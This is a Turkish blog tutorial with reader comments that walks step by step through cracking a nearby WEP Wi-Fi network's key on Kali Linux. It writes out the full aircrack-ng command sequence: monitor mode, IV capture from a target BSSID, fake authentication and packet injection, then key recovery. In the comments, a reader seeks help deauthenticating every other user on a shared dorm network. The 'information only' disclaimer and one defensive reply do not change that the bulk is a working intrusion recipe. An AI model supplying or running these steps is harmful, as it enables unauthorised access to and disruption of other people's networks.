-->

Wireless Şifre Kirmak Wifi Hack Resimli Anlatim

Meraba Arkadaşlar Bugün Size WEB Wifi Hack'i Kendimce Anlatmaya Çalıştim Biraz Aceleye Geldi İdare Edin (: Faydali Olmasi Dileğiyle ... Bu KONUMUZDA Sizlere Wmware Work Station 10 Üzerinde Kali Linux Kurulumundan Bahsetmiştim. Şimdi İse Kali Linuxta Şifreleme Türü WEB Olan Ağların Nasıl Şifrelerinin Elde Edilebileceğini Anlatıcam. Tabikide Bilgi Amaçlıdır. 


Videolu Anlatım : Resimli Anlatım:  
  1.komut :" iwconfig"


2.komut:"ifconfig"wlan0 HWaddr:00:25:22:4c:50:17 yazan bölüm bizim MAC adresimiz.

 

3.Komut:"airmon-ng start wlan0" Bu Komut İle Ağ Kartimizi Aktif Hale Getiriyoruz. (Monitor Mode Enabled on mon0)

 

4.Komut :"airodump-ng mon0"Komutu İLe Çevremizdeki Wifi Ağlarin Essid (İSMİ) BSSİD (Mac Adresi) CH (Yayin Yaptiği Kanal Numarasi)ni görebiliriz. Buradan Kendimize Şifreleme Türü WEB Olan Bi Hedef Seçiyoruz Hedefimizin Mac (BSSİD) CH(Kanal NO) Aliyoruz notepad dosyasına kaydediyoruz. (Ben Guvenlik İçin Bssid Ve Essid'i Gizledim.)

 

5.Komut:"airodump-ng -c 6 --bssid 00:00:XX:XX:XX:XX hedef mac --ivs -w deneme mon0"yada hedef modem ismini yaz mon0 enter.Burdaki -c Hedefin yayin yaptiği kanal numarasi. örn: "airodump-ng -c 6 --bssid 11:22:33:23:83:44 --ivs -w wifihack mon0" burdaki "wifihack" yazisi toplayacak olan paket dosyamizin adi "wifihack" bu dosyada başlangıç klasorüne kayit edilecek otomatik olarak.

 

6.Komut:Trafik Oluşturma. "aireplay-ng -1 2 -o 10 -q 10 -a hedef mac adresini yaz buraya -h kendi mac adresini buraya yaz mon0" Örn:aireplay-ng -1 2 -o 10 -q 10 -a 00:00:XX:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

7.Komut:Yeni Bir Konsol Açıp Şu Komutlari Yaziyoruz:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b hedef mac adresi -h bizim mac adresi mon0" Örn:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

8.Komut:Bu Kisimda Yapmamiz Gereken Paket Toplamasini Beklemek Yeteri Kadar Paket Topladiğinda Şifre Kirma İşlemimiz Kisa Sürede Sonuç Verecektir.

 

9.Komut: En Sevdiğim Kısım (: Yeni Bi Terminal Açıyoruz Ve "aircrack-ng -a 1 wifihack-01.ivs" Yaziyoruz Ve Topladiğimiz Paketleri Kirmaya Başlıyoruz. Hatirlarsaniz 5. Komutta Dosya İsmimizi "wifihack" Olarak Belirtmiştik Bu Yüzden 5.Komutta Vericeğiniz İsmi Unutmayiniz Unutursanizda Zaten Başlangıç Klasoründe Olucaktir (:

 

10.Komut: aircrack-ng -a 1 wifihack-01.ivs

 

Ve İşte Kirilan Şifremiz KEY FOUND! [* *: * *: * *: 9 9:9 9:] Aralarindaki : İşaretlerini Silin Ve Bağlanin.. Yakinda Hanshake Yakalayarak WPA WPA2 Hack'i Anlaticağim Takipte Kalin. Yapamayan Hata Alan Yorum Yapsın Yardimci Olalim.
ip adresi

Share
Uyari: Telif hakkı tamamen kaynağa aittir. Bu konuyla ilgili bir sorun varsa, burada bizimle iletişime geçebilirsiniz. Contact.

EN SON MAKALELER

13 yorum

Teşekkürler. Peki Wifimizin Hacklenmemesi İçin ne yapicaz ?

Rica Ederim Öncelikle Şifrenizi Değiştirmekle Başlayin İşe Harf Rakam : İşaretleri Gibi Güvenli Karışık Şifreler Oluşturunuz Daha Sonra Modeminizin Güvenlik Türünü WPA WPA2 Olarak Değiştiriniz Gerekirse MAC Filtrelemesi Yapiniz Ve Son Olarak Who Is On My Wifi v2.1.9 Programını Kullananiniz. Bu Program Sayesinden Wifinize İzinsiz Erişimlerin Mac Adresleri İp Adreslerini Görebilir Bunlari Kisitlayabilirsiniz.

Teşekkürler Türkçe kaynak bulmak gerçekten zor çalışmalarınızın devamını bekliyoruz. BAŞARILAR

Teşekkürler.

iwconfig yazdığımda bu çıkıyor

lo no wireless extensions.

eth0 no wireless extensions.

Böyle oluyor nasıl Yapabilirim Yardım et Kardeşim

Bu Arada Çok Yararlı Konular Paylaşıyorsun Başarılarının Devamını Diliyorum..

İyi günler, ben WifiJummer ile hedef ağ üzerindeki cihazları düşürmeyi anladım. Yalnız ben şöyle bir şey yapmak istiyorum. Hedef ağ kalabalık bir ağ yurttayım yani. Sadece kendi fiziksel bilgisayarımın mac adresini hariç tutarak diğerlerini engellemek istiyorum. Bunu nasıl yapabileceğim hakkında bilginiz var mı acaba?

Teşekkür ederim.

Who Is On My Wifi İle Windows Üzerinde Dediğini Yapabilirsin.

Kali Linux böyle bir imkan sağlamıyor mu? Daha çok linux üzerinde uzmanlaşmaya çalışıyorum o yüzden Linux'u sordum.

Var Aklımda Bişide Denemeden Yönlendirmek Istemedım Şu Aralar Yogunum Ama Ufak Bi Araştırmayla Bulabilirsin

Benimde var aslında ama Python dilimi bilmem lazım, oda bende yok. Wifi_jammer.py dosyasını açtığımızda içinde ki kodlar Python dilinde yazılmış. Oraya istisna bi değişken ayarlayıp ağdan düşürmek istemediğimiz mac ı tanımlayabiliriz. Sizin aklınızdaki nedir acaba. Birde İngilizcem yeterli seviyede olmadığı için vr şeyler bulamıyorum.

Dostum usbli linux destekli wifi adaptörü al oyle dene

Teşekkür Ederim Butur Yorumlariniz Mutlu Ediyor Beni Dilim Döndüğünce Elimden Geldigince Anlatmaya Çalışıyorum

Yorum Gönder